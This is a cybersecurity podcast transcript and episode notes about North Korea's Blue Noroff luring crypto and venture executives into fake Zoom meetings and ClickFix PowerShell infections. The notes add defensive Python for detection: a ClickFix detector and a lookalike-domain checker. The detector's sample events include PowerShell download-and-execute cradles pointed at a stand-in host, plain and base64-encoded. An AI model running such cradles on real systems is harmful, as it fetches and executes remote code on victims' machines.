Maria Varmazis
You're listening to the CyberWire Network, powered by N2K. Do you know how the space and cybersecurity domains connect? T-Minus Space Cyber Briefing is your guide through the space-based systems that expand the attack surface. I'm Maria Varmazis, host here at N2K CyberWire, and I'm excited to share that T-Minus is back now as a weekly podcast, the T-Minus Space Cyber Briefing. We have a new dedicated focus on two great things that are even better together: space and cybersecurity. Because whether we realize it or not, we all depend on space-based systems that are, by the way, increasingly Internet enabled. We're talking cybersecurity technologies, policies and organizations that are securing the critical space-based infrastructure that powers, protects and connects our lives here on Earth.
Maria Varmazis
So join me for T-Minus Space Cyber Briefing. New episodes every Sunday.
Dave Bittner
Maybe that's an urgent message from your CEO. Or maybe it's a deepfake trying to target your business. Doppel is the AI-native social engineering defense platform fighting back against impersonation and manipulation. As attackers use AI to make their tactics more sophisticated, Doppel uses it to fight back, from automatically dismantling cross-channel attacks to building team resilience and more. Doppel: outpacing what's next in social engineering. Learn more at doppel.com. That's D-O-P-P-E-L dot com. Hello everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.
Ismail Valenzuela
This began with what appeared to be a legitimate business meeting invitation. The victim received a Calendly invite that eventually directed them to a typosquatted Zoom domain hosting a fully simulated fake meeting environment, which is one of the most interesting pieces about this research.
Dave Bittner
That's Ismail Valenzuela, VP of Labs, Threat Research and Intelligence at Arctic Wolf. The research we're discussing today is titled "Blue Noroff Uses ClickFix, Fileless PowerShell and AI-Generated Fake Zoom Meetings to Target the Web3 Sector."
Ismail Valenzuela
Yeah, once the victim joined the meeting, the attackers then used some more traditional social engineering to get the victim to install what looked like an update for Zoom, right, a Zoom SDK update. But in reality that was a multi-stage infection chain including PowerShell, browser credential theft, Telegram session theft, persistence and even collecting screenshots.
Dave Bittner
Well, before we dig into a lot of the details here and the specifics, you have said with a fairly high degree of confidence that Blue Noroff is who you're attributing this to. What do we know about that group?
Ismail Valenzuela
Yeah, so this is a group that is associated with North Korea, or the DPRK, the Democratic People's Republic of Korea. And this is essentially the same playbook that they have been using for quite some time, where the primary objective of their activities is essentially financial theft, and the fact that they're targeting cryptocurrency executives, exchange operators, blockchain wallet developers, this is very consistent with the playbook for this group, Blue Noroff. And essentially what they want to do is to generate revenue to keep supporting the country's interests.
Dave Bittner
Well, let's walk through this step by step. I mean, you mentioned that this begins with a Calendly invite. Can you take us through the details of what the victim experiences here?
Ismail Valenzuela
Yes. So the victim receives this invite and, instead of going to the domain that they think they're going to, they use a typosquatted Zoom domain. I like to call it a cousin domain or a lookalike domain that may look legitimate, like something related to the day-to-day work, but they're essentially going to a domain that is controlled by the attackers. When they go to this Zoom call, what they get into is a fake meeting, which is very, very interesting, because this meeting has content that is specifically tailored to the victim. That shows that the attacker has been able to conduct detailed investigative work prior to setting up every meeting, which is very, very interesting. At least one of the 100 targets that we identified beyond the primary victim that we investigated in this case has publicly disclosed on LinkedIn that their identity was used by the threat actor to approach other targets, showing that there is kind of a pipeline to lure more people into this attack, as we document in the report. And when the victim would join the call, they would see videos, they would see personas that are related to their day-to-day job. So if they were in the crypto world, they would see relevant people from the crypto world. Some of this content would be scraped out of YouTube webinars and other public resources. Some of this content would be stolen from the footage recorded from previous victims that would be incorporated into their library. At the time of this recording, I can tell you there are more than a thousand videos in this library.
Dave Bittner
Help me understand this part of it, because it seems like a tremendous amount of effort goes into this particular campaign here. Were they using AI-generated images? Were they cleverly using the stolen webcam footage? Are they looping things in the background? What are they doing?
Ismail Valenzuela
What we found is that they use a combination of different things: scraping public videos out there from YouTube or webinars, and also deepfakes that they have generated, along with actual footage recorded from victims that got infected. And then they would join this call, and you could see how their faces look a little bit confused. They're clicking on links, they're trying to find out what's going on. And this is directly stolen out of their computer. As we explained in the report, they would use a specific API to enable the recording of the webcam and the microphone to gather this information from the victims.
Dave Bittner
Yeah, it's interesting. I mean, how many of us join a Zoom meeting? And that's exactly the first thing you're used to seeing, are people just getting settled in and trying to make sure everything's working. So it all seems normal at first, I suppose.
Ismail Valenzuela
Yeah, absolutely. And we have evidence that the captured footage enters kind of a production pipeline, as professionals would do. The attacker actually processes the video through Adobe Premiere Pro. And it's worth mentioning that at least one image was edited with Microsoft Paint. So I guess, you know, maybe they ran out of budget, I don't know.
Dave Bittner
Going old school. Right, right. So let's continue down the pathway here. I mean, I'm a victim and I've entered this Zoom meeting, even though it's not a real Zoom meeting. What happens next?
Ismail Valenzuela
Yes, so what happens next is that the victim would receive some communications that, oh, you know, maybe something is not right, we cannot hear you or we cannot see you. Well, they would continue the social engineering by trying to convince the victim to install an update, right, for Zoom. And I'm saying Zoom here, but I have to say, since the publication of our report, we've seen the attacker moving away from Zoom and using Microsoft Teams-themed lures towards other organizations, including outside of crypto now: enterprise software, business services. But that's kind of the idea, right? Once they convince you that you are among peers, or joining a webinar, a call with people that share the same interests, they would ask you to execute something on your machine. That's where the PowerShell comes in, or, you know, a binary in some cases. This is not that different from the fake captcha and other social engineering attacks that we see on a regular basis, where they convince you to just copy and paste some commands on your machine that are going to install the malicious implant.
Dave Bittner
We'll be right back.
Maria Varmazis
Study and play come together on a Windows 11 PC, and for a limited time, college students get the best of both worlds. Get the unreal college deal: everything you need to study and play with select Windows 11 PCs. Eligible students get a year of Microsoft 365 Premium and a year of Xbox Game Pass Ultimate with a custom color Xbox wireless controller. Learn more at windows10.com/studentoffer. While supplies last, ends June 30, terms at aka.ms/collegepc. When you need to build up your team to handle the growing chaos at work, use Indeed Sponsored Jobs. It gives your job post the boost it needs to be seen and helps reach people with the right skills, certifications and more. Spend less time searching and more time actually interviewing candidates who check all your boxes. Listeners of this show will get a $75 sponsored job credit at Indeed.com/podcast. That's Indeed.com/podcast. Terms and conditions apply. Need a hiring hero? This is a job for Indeed Sponsored Jobs.
Dave Bittner
And your research points out that once they go down this path, it is minutes before they've had the system fully compromised.
Ismail Valenzuela
That is correct. Once the machine is fully compromised, it could be less than five minutes. The attacker is stealing the Telegram sessions, the browser credentials, the webcam footage, the audio from the microphone. And then they use these compromised accounts, these identities, to approach other victims. So now that means that these messages coming to you through Telegram, or these invitations, may come from people that you trust.
Dave Bittner
Now, I'm on this Zoom call and they've convinced me to run this software, they've installed the malware. Are they keeping me on the line? Or am I being discarded while they move on to the next person?
Ismail Valenzuela
Well, I mean, based on the information that we have, we haven't joined these calls ourselves necessarily. We have seen all the analysis that comes out of the investigation. But according to the videos that we have seen, the victim may have been connected for some time, enough time for the attacker to be able to convince you to do something, to install something on your computer. Once they have the information, there's no need to keep you there any longer. So if the call disconnects, it's like, okay, something didn't work, what is going on? But it doesn't really matter at that point. Those identities have been stolen. And as I said before, we have seen some victims on social media, LinkedIn, X, mentioning that, hey, my identity has been stolen and it has been used to approach other people in my network.
Dave Bittner
How did Arctic Wolf pivot from this initial intrusion that you investigated to identifying 100 additional targets?
Ismail Valenzuela
Well, so part of that is based on our amazing threat research team. I have to say that we track threat actors. We have been doing this for a long time. And also based on our telemetry, the ability to pivot from endpoint data, which was the very first indication or signal that we got here, to the ability to pivot to other infrastructure, to people, to network telemetry, cloud telemetry from over 10,000 customers, and a lot of the open source intelligence that we gather out there too.
Dave Bittner
Was there anything that stood out about the victims themselves in terms of who they were going after? Are there particular parts of the world or particular industries that they seem to be targeting?
Ismail Valenzuela
Yeah, that's an interesting one. About 45 to 50% of the victims were CEOs and founders. About 70% were related to blockchain exchanges, but also venture capital companies. The geographic spread was over 20 countries. So that tells you that this is a well-resourced operation with language capabilities and cultural awareness to do social engineering across multiple regions. And some of the individuals that we have found that were victims of this were well known, some of them public figures, people in different industries that have a high profile.
Dave Bittner
It's a good reminder that these sorts of things can happen to anyone.
Ismail Valenzuela
Absolutely. In terms of countries, the majority were focused on the United States, but we also found Singapore, United Kingdom, and we're seeing since the publication of our research that they're expanding to other geographies and other businesses too.
Dave Bittner
In terms of the attribution, what can you share with us in terms of evidence that supported your high confidence attribution that this was the North Koreans?
Ismail Valenzuela
Well, when we talk about attribution, we typically talk about several things. You know, the indicators of compromise, the infrastructure that they use. As I said before, we have been tracking these threat actors for a long time. And if you look at the publications that we have done in the past, you're going to see that this is not the first Blue Noroff publication that we have done. And the playbook is very, very distinct. And the motivation, the first motivation is, as I said before, financial: to support the regime and to bypass the embargoes from the UN on this country. But we're not the only ones that have seen this. There are other peers in the industry that have been reporting the same playbook coming out of Blue Noroff, which always adds additional confidence to our assessment.
Dave Bittner
So what are the takeaways here for defenders? What sort of things should security teams take away from your research?
Ismail Valenzuela
Well, the first one that you already talked about, Dave, it's essentially training, right? Proactive security training, security awareness. This is one of the oldest things in cybersecurity. Knowing that, you know, you have to validate every single request, recognize the red flags of phishing, and routinely verify meeting requests, especially when it is something that looks suspicious, via a secondary contact method. Browser security. This is kind of a new field as well in cybersecurity. Well, maybe not so new for those of us that have been around for a long time, but we see very specific threats against browsers these days. There's a particular API, getUserMedia, that should only be available to trusted domains. Clipboard monitoring restrictions where feasible. Email and calendar security as well: inspecting these invites, especially when the invitations come from domains that look like domains we recognize, but they're not really those domains. And of course, threat intelligence, threat modeling, knowing exactly that if you are in the business of cryptocurrency, if you have wallets with high value, if you're a public figure, if you have a high position in an organization, know that these threat actors are going after you. And knowing this should drive the countermeasures. This is what I usually call think red or blue, right? Think as an attacker to become a better defender.
Dave Bittner
You know, I think about an attack like this, and particularly the element with Calendly, I would fall for, because I feel like this is such a part of my day to day, right? Responding to calendar invites, sending out calendar invites, meeting with people in these online conference sessions like you and I are doing right now. It's such a part of my routine that I have to wonder, would I stop to check, because I'm in such a habit of doing this every day?
Ismail Valenzuela
Well, it's funny you mention that, Dave, because I joined your podcast through this Calendly invite, and the first thing I did, before clicking on it, I was like, hold on a second. Is this actually Dave or not? Good for you. But yeah, that's the reality. No one is free from any of these. But that's why you want to have several controls along the way. Because if something, you know, fails, it could be you under stress, doing something urgently on your phone, at least you have other layers. And also having the information, right, listening to this podcast, having the right information to say, hold on a second, I'm going to verify and double check, especially these types of requests.
Dave Bittner
Our thanks to Ismail Valenzuela from Arctic Wolf for joining us. The research is titled "Blue Noroff Uses ClickFix, Fileless PowerShell and AI-Generated Fake Zoom Meetings to Target the Web3 Sector." We'll have a link in the show notes. And that's Research Saturday, brought to you by N2K CyberWire. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2connect. This episode was produced by Liz Stokes. We're mixed by Elliott Peltzman and Trey Hester. Our executive producer is Jennifer Eiben, Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.
Maria Varmazis
Some follow the noise. Bloomberg follows the money. Whether it's the funds fueling AI or crypto's trillion-dollar swings, there's a money side to every story. Get the money side of the story. Subscribe now at bloomberg.com.
Date: June 6, 2026
Host: Dave Bittner
Guest: Ismail Valenzuela, VP of Labs Threat Research & Intelligence, Arctic Wolf
Main Theme: Deep-dive into a new, sophisticated social engineering campaign attributed to North Korea’s Blue Noroff, which uses fake AI-generated Zoom (and Teams) meetings to compromise targets—primarily in the Web3, cryptocurrency, and venture sectors.
This episode spotlights recent research from Arctic Wolf on a complex, multi-stage cyberattack campaign. The attackers, identified as Blue Noroff (a North Korea-linked group), lure high-value individuals with AI-driven, fake video meeting invites, ultimately stealing credentials, private data, and leveraging compromised identities for further attacks. The conversation unpacks the attack flow, technical tactics, and broader implications for defenders and organizations.
Initial Lure:
The attack begins with a victim receiving what looks like a legit business meeting invite, often via calendar services such as Calendly.
Fake Meeting Environment:
The attacker uses typosquatted (lookalike) domains to mimic known video conferencing platforms (initially Zoom, now also Microsoft Teams). The fake meeting's content is carefully tailored to the victim, sourced from scraped public webinars and YouTube videos, webcam footage recorded from previously compromised victims, and deepfakes; at the time of recording the attackers' library held more than a thousand videos.
Stealing Credentials & More:
Via social engineering inside the fake meeting ("we can't hear you, install this Zoom SDK update"), victims are talked into running a supposed update. The chain escalates quickly: browser credentials, Telegram sessions, screenshots and webcam/microphone recordings are taken in under five minutes, and the stolen identities are then used to approach the victim's own contacts.
AI & Video Manipulation:
The attacker's content pipeline involves scraping YouTube/webinars, deepfake generation, and reusing compromised victims' actual webcam footage, edited with professional tools (Adobe Premiere Pro) and, in at least one case, Microsoft Paint.
Malware Execution:
Payloads are delivered as a supposed update, either as a binary or as commands the victim is asked to copy and paste (ClickFix), with PowerShell running the later stages filelessly. Clipboard restrictions are relevant because the lure depends on the victim pasting attacker-supplied commands into their own machine.
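ClickFix-style launches leave a recognisable process-creation trail: PowerShell started by explorer.exe (the Run dialog or a pasted command), with a hidden window, an execution-policy bypass and an inline or base64-encoded download-and-execute cradle instead of a script file. The following is an added example, not code from the Arctic Wolf report, the podcast or any vendor tool. It scores constructed process-creation events (field names modelled on Sysmon Event ID 1) and decodes -EncodedCommand arguments so indicators hidden behind base64 still count. The indicator weights, the threshold and the sample events are assumptions chosen for the example.

```python
"""
Added example (not from the Arctic Wolf report or the podcast): a small
detector for ClickFix-style fileless PowerShell launches, run over
constructed process-creation events. The field names (parent_image,
image, command_line) mirror Sysmon Event ID 1 / EDR telemetry; the events
themselves are made up for this example.
"""
import base64
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]

# (name, weight, regex) applied to the "effective" command line: the raw
# command line plus the decoded text of any -EncodedCommand argument.
INDICATORS: List[Tuple[str, int, re.Pattern]] = [
    ("hidden_window",     2, re.compile(r"-w[a-z]*\s+hidden", re.I)),         # -w hidden / -WindowStyle Hidden
    ("no_profile",        1, re.compile(r"-nop[a-z]*\b", re.I)),              # -nop / -NoProfile
    ("ep_bypass",         1, re.compile(r"-e(?:p|x)[a-z]*\s+bypass", re.I)),  # -ep bypass / -ExecutionPolicy Bypass
    ("inline_command",    1, re.compile(r"(?:^|\s)-c(?:ommand)?\b", re.I)),   # script passed inline, not via -File
    ("download",          2, re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                        r"downloadstring|downloadfile|net\.webclient|curl|wget)\b", re.I)),
    ("invoke_expression", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("clipboard",         2, re.compile(r"clipboard", re.I)),                 # Get-Clipboard / [Windows.Clipboard]
]
PARENT_WEIGHT = 2    # PowerShell launched by explorer.exe (Win+R / Run dialog): how a pasted ClickFix command lands
ENCODED_WEIGHT = 1   # -EncodedCommand is legitimate but common in lures; assumed weight
THRESHOLD = 5        # assumed alerting threshold

# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -en, -enc, ...
ENCODED_ARG = re.compile(r"(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
POWERSHELL = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)


def decode_encoded_command(command_line: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if there is none."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: Event) -> Tuple[int, List[str]]:
    """Score one process-creation event; returns (score, matched indicator names)."""
    if not POWERSHELL.search(event["image"]):
        return 0, []
    cmdline = event["command_line"]
    decoded = decode_encoded_command(cmdline)
    effective = cmdline + " " + decoded
    score, hits = 0, []
    if event["parent_image"].lower().endswith("\\explorer.exe"):
        score += PARENT_WEIGHT
        hits.append("parent_explorer")
    if decoded:
        score += ENCODED_WEIGHT
        hits.append("encoded_command")
    for name, weight, pattern in INDICATORS:
        if pattern.search(effective):
            score += weight
            hits.append(name)
    return score, hits


def is_clickfix_candidate(event: Event) -> bool:
    return score_event(event)[0] >= THRESHOLD


def _encode(text: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample events (not real telemetry; example.invalid is a reserved name).
SAMPLE_EVENTS: List[Event] = [
    {  # admin running a script from the Run dialog: explorer parent, but file-based and no cradle
        "parent_image": r"C:\Windows\explorer.exe", "image": PS_EXE,
        "command_line": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {  # ClickFix-style paste into Win+R: hidden window, bypass, inline download-and-execute
        "parent_image": r"C:\Windows\explorer.exe", "image": PS_EXE,
        "command_line": 'powershell.exe -w hidden -nop -ep bypass -c "iwr https://example.invalid/update.txt | iex"'},
    {  # the same cradle hidden behind -enc; only visible after decoding
        "parent_image": r"C:\Windows\explorer.exe", "image": PS_EXE,
        "command_line": "powershell.exe -enc "
        + _encode("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/a')")},
    {  # scheduled agent task: bypass flags alone should not alert
        "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS_EXE,
        "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Agent\collect.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        score, hits = score_event(ev)
        print(f"{score:2d} {'ALERT' if score >= THRESHOLD else 'ok   '} {ev['command_line'][:60]}  {hits}")
```

Running the file prints a score and the matched indicators for each sample; to use it on real telemetry, map ParentImage, Image and CommandLine from Sysmon or your EDR into the event dict. The two benign samples show why neither the explorer.exe parent alone nor bypass flags alone should page anyone: it is the combination with a download cradle, hidden window and inline or encoded script that matters.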
Victimology:
Attackers focused on executives (CEOs, founders), primarily at blockchain exchanges and venture capital firms; since publication the lures have spread to enterprise software and business services companies.
Global Reach:
Over 20 countries affected; U.S. is primary, but activity observed in Singapore, UK, and expanding sectors.
Attribution Confidence:
The playbook, infrastructure and indicators match Arctic Wolf's earlier Blue Noroff reporting and that of industry peers. The group is DPRK-linked and financially motivated, stealing from high-value individuals to generate revenue for the regime and work around UN sanctions.
Awareness is Key:
Regular, proactive security training; urge extra scrutiny on calendar invites and meeting links, especially when received unexpectedly—even from known contacts.
Browser & Session Security:
Restrict high-risk browser APIs such as getUserMedia (camera and microphone) to trusted domains, restrict clipboard access where feasible, inspect calendar invites that arrive from lookalike domains, and double-check any surprising request to install an update or switch meeting platforms.
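Both the lookalike-domain check under Fake Meeting Environment and the browser-API restriction above come down to the same allowlist of conferencing origins. The following is an added example, not code from the Arctic Wolf report or the podcast. It classifies the host in a meeting link as trusted, lookalike or untrusted, and emits the Chrome enterprise policy (VideoCaptureAllowed, VideoCaptureAllowedUrls, AudioCaptureAllowed, AudioCaptureAllowedUrls) that denies camera and microphone access, which is what getUserMedia requests, to everything outside that same list. The trusted patterns, brand tokens, edit-distance threshold and sample links (including the lookalike hosts) are assumptions made for the example; the naive registrable-domain helper should be replaced with a Public Suffix List lookup in production.

```python
"""
Added example (not from the Arctic Wolf report or the podcast): vet the host
in a meeting link against the conferencing domains an organisation actually
uses, flag lookalikes, and emit the matching Chrome capture policy.
The trusted patterns, brand tokens and sample links are assumptions.
"""
from urllib.parse import urlsplit

# Chrome URL-pattern syntax: "[*.]" matches the domain and any subdomain.
TRUSTED_PATTERNS = [
    "https://[*.]zoom.us",
    "https://teams.microsoft.com",
    "https://[*.]teams.microsoft.com",
    "https://[*.]teams.live.com",
]
# Brand words an attacker would embed in a lookalike host (assumed list).
BRAND_TOKENS = ("zoom", "teams", "microsoft", "calendly")
MAX_EDIT_DISTANCE = 2  # assumed: registrable domains this close to a trusted one are lookalikes


def _pattern_host(pattern: str):
    """'https://[*.]zoom.us' -> ('zoom.us', True); exact-host patterns -> (host, False)."""
    host = pattern.split("://", 1)[1].rstrip("/")
    if host.startswith("[*.]"):
        return host[4:], True
    return host, False


def host_matches(host: str, pattern: str) -> bool:
    base, wildcard = _pattern_host(pattern)
    return host == base or (wildcard and host.endswith("." + base))


def registrable(host: str) -> str:
    """Naive registrable domain (last two labels). Use the Public Suffix List in production."""
    return ".".join(host.split(".")[-2:])


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_meeting_link(url: str) -> str:
    """Return 'trusted', 'lookalike' or 'untrusted'. Only https links to allowlisted hosts are trusted."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme == "https" and any(host_matches(host, p) for p in TRUSTED_PATTERNS):
        return "trusted"
    trusted_bases = {registrable(_pattern_host(p)[0]) for p in TRUSTED_PATTERNS}
    reg = registrable(host)
    near_miss = any(levenshtein(reg, t) <= MAX_EDIT_DISTANCE for t in trusted_bases)
    brand_abuse = any(tok in host for tok in BRAND_TOKENS)
    return "lookalike" if (near_miss or brand_abuse) else "untrusted"


def chrome_capture_policy() -> dict:
    """Chrome enterprise policy: camera/mic capture is off except for the listed URL patterns."""
    return {
        "VideoCaptureAllowed": False,
        "VideoCaptureAllowedUrls": TRUSTED_PATTERNS,
        "AudioCaptureAllowed": False,
        "AudioCaptureAllowedUrls": TRUSTED_PATTERNS,
    }


# Constructed sample links; the lookalike hosts are invented for the example, not taken from the report.
SAMPLE_LINKS = {
    "https://us06web.zoom.us/j/1234567890": "trusted",
    "https://teams.microsoft.com/l/meetup-join/abc": "trusted",
    "https://us04web-zoom.us/j/1234567890": "lookalike",   # brand token inside an unrelated registrable domain
    "https://zoon.us/j/1234567890": "lookalike",           # one character off the real domain
    "https://zoom.us.example.com/meet": "lookalike",       # real brand as a subdomain of an attacker-held domain
    "https://meet.example.org/room/42": "untrusted",       # unknown, but not pretending to be anything
}

if __name__ == "__main__":
    import json
    for link in SAMPLE_LINKS:
        print(f"{classify_meeting_link(link):10s} {link}")
    print(json.dumps(chrome_capture_policy(), indent=2))
```

Deploy the policy dict through the managed-policy mechanism for your platform (registry on Windows, a JSON file in the managed policies directory on Linux, a configuration profile on macOS). With it in place, a fake meeting page on a lookalike domain cannot turn on the webcam or microphone at all, whatever the user clicks; the link classifier belongs in the mail or calendar pipeline, where an invite pointing at a lookalike host can be quarantined before anyone joins.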
Layered Security Controls:
Multiple technical and administrative safeguards are needed, as even the most careful users can slip under stress or “routine” circumstances.
Human Nature & Routine as a Risk:
Calendar invites and video calls are part of the daily routine, so even experienced people may not stop to verify a familiar-looking request; that habit is what the lure exploits.
Attackers Reusing Stolen Identities:
Stolen Telegram sessions and accounts are used to approach the victim's contacts, so follow-on invitations arrive from people the next target trusts; at least one target has disclosed on LinkedIn that their identity was used this way.
Vigilance, Even on This Podcast:
Valenzuela notes that he paused to confirm the Calendly invite for this very recording actually came from Bittner before clicking it; verifying through a secondary channel is the habit to build.
Summary:
This episode gives a sobering look at the increasing realism and sophistication of social engineering attacks—specifically, Blue Noroff’s operation using AI-driven, fake video meetings to breach high-profile targets. The research highlights how attackers blend deep recon with social engineering, AI, and video manipulation to weaponize trust and habit. The experts stress the need for ongoing vigilance, layered defenses, and security awareness—even for seasoned professionals.